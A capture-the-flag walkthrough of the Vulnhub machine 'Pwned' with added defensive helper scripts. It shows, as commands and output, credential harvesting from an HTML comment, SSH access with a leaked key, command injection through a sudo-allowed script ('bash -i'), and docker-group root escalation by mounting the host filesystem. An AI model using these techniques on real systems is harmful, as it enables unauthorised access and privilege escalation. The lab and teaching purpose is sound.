[VLN] Pwned

Today we are going to hack the Vulnhub machine called Pwned. You can download it from the following link: https://www.vulnhub.com/entry/pwned-1,507/
  • Video
  • Enumeration
    We start with a full-port nmap scan to see which ports are open.
    ~ > nmap -A -p- 192.168.1.93
    Starting Nmap 7.80 ( https://nmap.org ) at 2020-07-10 17:04 CEST
    Nmap scan report for pwned.home (192.168.1.93)
    Host is up (0.0011s latency).
    Not shown: 65532 closed ports
    PORT   STATE SERVICE VERSION
    21/tcp open  ftp     vsftpd 3.0.3
    22/tcp open  ssh     OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
    | ssh-hostkey:
    |   2048 fe:cd:90:19:74:91:ae:f5:64:a8:a5:e8:6f:6e:ef:7e (RSA)
    |   256 81:32:93:bd:ed:9b:e7:98:af:25:06:79:5f:de:91:5d (ECDSA)
    |_  256 dd:72:74:5d:4d:2d:a3:62:3e:81:af:09:51:e0:14:4a (ED25519)
    80/tcp open  http    Apache httpd 2.4.38 ((Debian))
    |_http-server-header: Apache/2.4.38 (Debian)
    |_http-title: Pwned....!!
    Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel

    Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
    Nmap done: 1 IP address (1 host up) scanned in 13.09 seconds
    Three services: FTP, SSH and a web server. Let's explore port 80 a bit further with a directory brute force.
    ~ > gobuster dir -u 192.168.1.93 -w /usr/share/seclists/Discovery/Web-Content/directory-list-lowercase-2.3-big.txt
    ===============================================================
    Gobuster v3.0.1
    by OJ Reeves (@TheColonial) & Christian Mehlmauer (@_FireFart_)
    ===============================================================
    [+] Url:            http://192.168.1.93
    [+] Threads:        10
    [+] Wordlist:       /usr/share/seclists/Discovery/Web-Content/directory-list-lowercase-2.3-big.txt
    [+] Status codes:   200,204,301,302,307,401,403
    [+] User Agent:     gobuster/3.0.1
    [+] Timeout:        10s
    ===============================================================
    2020/07/10 17:27:57 Starting gobuster
    ===============================================================
    /nothing (Status: 301)
    /hidden_text (Status: 301)
    /server-status (Status: 403)
    We find the hidden_text directory. Visiting http://192.168.1.93/hidden_text shows a single file, secret.dic, which contains:
    /hacked
    /vanakam_nanba
    /hackerman.gif
    /facebook
    /whatsapp
    /instagram
    /pwned
    /pwned.com
    /pubg
    /cod
    /fortnite
    /youtube
    /kali.org
    /hacked.vuln
    /users.vuln
    /passwd.vuln
    /pwned.vuln
    /backup.vuln
    /.ssh
    /root
    /home
    It looks like a custom wordlist, so we download secret.dic:
    wget http://192.168.1.93/hidden_text/secret.dic
    Once downloaded, we run gobuster again using secret.dic as the wordlist.
    ~/ctf/vulnhub/cybersploit > gobuster dir -u http://192.168.1.93 -w secret.dic
    ===============================================================
    Gobuster v3.0.1
    by OJ Reeves (@TheColonial) & Christian Mehlmauer (@_FireFart_)
    ===============================================================
    [+] Url:            http://192.168.1.93
    [+] Threads:        10
    [+] Wordlist:       secret.dic
    [+] Status codes:   200,204,301,302,307,401,403
    [+] User Agent:     gobuster/3.0.1
    [+] Timeout:        10s
    ===============================================================
    2020/07/10 17:31:52 Starting gobuster
    ===============================================================
    //pwned.vuln (Status: 301)
    ===============================================================
    2020/07/10 17:31:52 Finished
    ===============================================================
    Only pwned.vuln comes back (the double slash is just because the entries in secret.dic already start with a slash). We visit http://192.168.1.93/pwned.vuln/ and, in the page source, we find the login check commented out, with the credentials hardcoded. Commented-out server-side code is sent to every client, so anyone who views the source gets them:
    // if (isset($_POST['submit'])) {
    //     $un=$_POST['username'];
    //     $pw=$_POST['password'];
    //
    //     if ($un=='ftpuser' && $pw=='B0ss_B!TcH') {
    //         echo "welcome"
    //         exit();
    //     }
    //     else
    //         echo "Invalid creds"
    // }
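    Leaked comments like the one above are easy to miss when skimming a page, so here is a small helper to pull every HTML comment out of a saved page and flag the lines that look like credential comparisons. This is an added example, not part of the original writeup or of the box; the sample page is constructed for the example and mirrors the kind of leak found here, and the regex of "credential-looking" names is an assumption you should widen for your own targets.

```shell
#!/bin/sh
# Added example (not from the writeup): mine HTML comments for hardcoded creds.

# Constructed sample page, modelled on the pwned.vuln leak (not the real page).
SAMPLE_HTML='<html><body>
<form method="post"><input name="username"><input name="password"></form>
<!--
if (isset($_POST["submit"])) {
    $un=$_POST["username"];
    $pw=$_POST["password"];
    if ($un=="ftpuser" && $pw=="B0ss_B!TcH") { echo "welcome"; }
}
-->
</body></html>'

# Read HTML on stdin and print the body of every <!-- ... --> block, one line
# per comment line, blank lines dropped. Handles both single-line comments and
# comments that span several lines.
extract_html_comments() {
    awk '
        /<!--/ { inc = 1; sub(/.*<!--/, "") }
        inc {
            line = $0; done = 0
            if (line ~ /-->/) { sub(/-->.*/, "", line); done = 1 }
            if (line !~ /^[ \t]*$/) print line
            if (done) inc = 0
        }
    '
}

# Keep only comment lines that compare or assign a literal to a name that
# looks like a user or password field (assumed list: pass, pw, user, un).
# Exit status is grep's: 0 when something was found, 1 otherwise.
find_leaked_creds() {
    extract_html_comments | grep -iE "(pass|pw|user|un)[ \t]*==?[ \t]*[\"']"
}

# Against a live target you would run:
#   curl -s http://192.168.1.93/pwned.vuln/ | find_leaked_creds
# Offline, on the constructed sample:
#   printf '%s\n' "$SAMPLE_HTML" | find_leaked_creds
```

    The same idea applies to JavaScript comments and to HTML served only on error pages; the awk filter is the part worth reusing.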
    The username suggests FTP, so we log in to the FTP server with those credentials (ftpuser / B0ss_B!TcH).
    ~/ctf/vulnhub/cybersploit > ftp 192.168.1.93
    Connected to 192.168.1.93.
    220 (vsFTPd 3.0.3)
    Name (192.168.1.93:sml): ftpuser
    331 Please specify the password.
    Password:
    230 Login successful.
    Remote system type is UNIX.
    Using binary mode to transfer files.
    ftp> dir
    200 PORT command successful. Consider using PASV.
    150 Here comes the directory listing.
    drwxr-xr-x    2 0        0            4096 Jul 10 12:47 share
    226 Directory send OK.
    ftp>
    We explore the share folder on the FTP server and download its contents.
    ftp> cd share
    250 Directory successfully changed.
    ftp> ls
    200 PORT command successful. Consider using PASV.
    150 Here comes the directory listing.
    -rw-r--r--    1 0        0            2602 Jul 09 15:05 id_rsa
    -rw-r--r--    1 0        0              75 Jul 09 17:41 note.txt
    226 Directory send OK.
    ftp> get id_rsa
    local: id_rsa remote: id_rsa
    200 PORT command successful. Consider using PASV.
    150 Opening BINARY mode data connection for id_rsa (2602 bytes).
    226 Transfer complete.
    2602 bytes received in 0.00 secs (3.8592 MB/s)
    ftp> get note.txt
    local: note.txt remote: note.txt
    200 PORT command successful. Consider using PASV.
    150 Opening BINARY mode data connection for note.txt (75 bytes).
    226 Transfer complete.
    75 bytes received in 0.00 secs (61.8078 kB/s)
    The id_rsa file is most likely an SSH private key. We give it the permissions ssh requires, since ssh refuses to use a key that is readable by other users:
    ~ > chmod 600 id_rsa
    The other file is note.txt:
    ~ > cat note.txt
    Wow you are here
    ariana won't happy about this note
    sorry ariana :(
    The note mentions the user "ariana", and an unencrypted private key is useless without a username to try it against. We use the user ariana with the id_rsa key to see if we get a shell over ssh.
  • Low Shell
    ~ > ssh -i id_rsa ariana@192.168.1.93
    Linux pwned 4.19.0-9-amd64 #1 SMP Debian 4.19.118-2+deb10u1 (2020-06-07) x86_64

    The programs included with the Debian GNU/Linux system are free software;
    the exact distribution terms for each program are described in the
    individual files in /usr/share/doc/*/copyright.

    Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
    permitted by applicable law.
    Last login: Fri Jul 10 13:03:23 2020 from 192.168.18.70
    ariana@pwned:~$
  • user1.txt
    ariana@pwned:~$ cat user1.txt
    congratulations you Pwned ariana
    Here is your user flag
    fb8d98be1265dd88bac522e1b2182140
    Try harder.need become root
    We check whether the user ariana can use sudo, and for what:
    ariana@pwned:~$ sudo -l
    Matching Defaults entries for ariana on pwned:
        env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

    User ariana may run the following commands on pwned:
        (selena) NOPASSWD: /home/messenger.sh
    Good: we can run a script as the user selena, without a password. Let's look at the script:
    ariana@pwned:~$ cat /home/messenger.sh
    #!/bin/bash
    clear
    echo "Welcome to linux.messenger "
    echo ""
    users=$(cat /etc/passwd | grep home | cut -d/ -f 3)
    echo ""
    echo "$users"
    echo ""
    read -p "Enter username to send message : " name
    echo ""
    read -p "Enter message for $name :" msg
    echo ""
    echo "Sending message to $name "
    $msg 2> /dev/null
    echo ""
    echo "Message sent to $name :) "
    echo ""
    The line $msg 2> /dev/null is the bug: the message is expanded unquoted on a line of its own, so bash parses whatever we typed as a command line and runs it as selena. A sudoers entry that allows a script is only as safe as the script itself. We run it and enter "bash -i" as the message to get a shell as selena :)
    One catch: the script sends the command's stderr to /dev/null, and bash writes its interactive prompt to stderr, so the shell we get shows no prompt at all. It is still there and accepts commands; spawning a pty with python3 gives us a visible prompt.
    ariana@pwned:~$ sudo -u selena /home/messenger.sh
    Welcome to linux.messenger

    ariana:
    selena:
    ftpuser:

    Enter username to send message : bash -i

    Enter message for bash -i :bash -i

    Sending message to bash -i
    python3 -c 'import pty; pty.spawn("/bin/bash")'    # typed blind, no prompt is shown
    selena@pwned:/home/ariana$ id
    uid=1001(selena) gid=1001(selena) groups=1001(selena),115(docker)
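    To see exactly why the message gets executed, here is the vulnerable pattern next to a safe version, as an added example that is not the box's messenger.sh. Both functions take the message as an argument instead of reading it with read -p, so they can be run without a terminal; the stderr redirect is kept as in the original, which is also what hid the prompt above.

```shell
#!/bin/sh
# Added example (not the box's script): why "$msg 2> /dev/null" runs the input.

# Vulnerable: an unquoted $msg on a line of its own is not "printed", it is
# parsed as a command line. Word splitting turns "bash -i" into the command
# bash with the argument -i, which then runs with the script's privileges
# (selena, when invoked through sudo -u selena). stderr is discarded exactly
# as in messenger.sh.
vuln_send() {
    msg=$1
    $msg 2>/dev/null
}

# Safe: the message is data. A fixed printf format never evaluates it, and
# the double quotes stop word splitting and globbing of the message.
safe_send() {
    msg=$1
    printf 'Sending message: %s\n' "$msg"
}

# Same input, two outcomes:
#   vuln_send 'id -un'   -> prints the user the function runs as (the command ran)
#   safe_send 'id -un'   -> prints "Sending message: id -un"
```

    The sudo rule (selena) NOPASSWD: /home/messenger.sh restricts which program ariana can start, not what that program does with untrusted input; the fix belongs in the script, not in sudoers.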
  • user2.txt
    selena@pwned:~$ cat user2.txt
    711fdfc6caad532815a440f7f295c176
    You are near to me. you found selena too. Try harder to catch me
    The id output shows that selena belongs to the docker group. That is effectively root: the Docker daemon runs as root, and anyone who can talk to its socket can start a container with the host's filesystem bind-mounted into it. Let's see which images are available:
    selena@pwned:~$ docker images
    REPOSITORY          TAG                 IMAGE ID            CREATED             SIZE
    privesc             latest              09ae39f0f8fc        4 days ago          88.3MB
    <none>              <none>              e13ad046d435        4 days ago          88.3MB
    alpine              latest              a24bb4013296        5 weeks ago         5.57MB
    debian              wheezy              10fcec6d95c4        16 months ago       88.3MB
    We mount the host's root filesystem / inside a container from the "privesc" image and run /bin/sh. Inside the container we are root, and the host's files are under /mnt/fuckfs.
    selena@pwned:~$ docker run -v /:/mnt/fuckfs -ti 09ae39f0f8fc /bin/sh
    Now all that is left is to look at the host's /root through the mount. (From the same shell, chroot /mnt/fuckfs would give a root shell directly on the host filesystem, for example to drop a key into /root/.ssh/authorized_keys; reading the flag is enough here.)
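    Spotting a root-equivalent group in the output of id is the check that turned selena into root here, so as an added example (not from the original writeup) here is a small helper that parses an id string and reports such groups. The sample input is the writeup's own id line for selena; the list of groups treated as root-equivalent (docker, lxd, disk, sudo, wheel) is an assumption chosen for this example and is not exhaustive.

```shell
#!/bin/sh
# Added example (not from the writeup): flag root-equivalent groups in `id` output.

# Constructed sample: the id line the writeup obtained as selena.
ID_SAMPLE='uid=1001(selena) gid=1001(selena) groups=1001(selena),115(docker)'

# Print one group name per line from an `id` string
# ("groups=1001(selena),115(docker)" -> "selena", "docker").
id_groups() {
    printf '%s\n' "$1" \
        | sed -n 's/.*groups=//p' \
        | tr ',' '\n' \
        | sed 's/^[0-9]*(\(.*\))$/\1/'
}

# Print the user's groups that give root-equivalent access, in the order they
# appear; prints nothing when there are none. Assumed list:
#   docker - can start a container with -v /:/mnt, i.e. root on the host fs
#   lxd    - same trick with LXD containers
#   disk   - raw read/write on block devices, so the whole filesystem
#   sudo, wheel - may run commands as root, check `sudo -l`
root_equiv_groups() {
    id_groups "$1" | grep -xE 'docker|lxd|disk|sudo|wheel' || true
}

# On a live shell:  root_equiv_groups "$(id)"
```

    The docker case is exactly the one exploited above: membership in that group should be treated as root, and on a real system it belongs only to administrators who already have it.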
  • root.txt
    # cd /mnt/fuckfs/root
    # ls
    root.txt
    # cat root.txt
    4d4098d64e163d2726959455d046fd7c
    You found me. i dont't expect this (◎ . ◎)
    I am Ajay (Annlynn) i hacked your server left and this for you.
    I trapped Ariana and Selena to takeover your server :)
    You Pwned the Pwned congratulations :)
    share the screen shot or flags to given contact details for confirmation
    Telegram https://t.me/joinchat/NGcyGxOl5slf7_Xt0kTr7g
    Instgarm ajs_walker
    Twitter Ajs_walker
  • End
    And with that we are root on the machine :)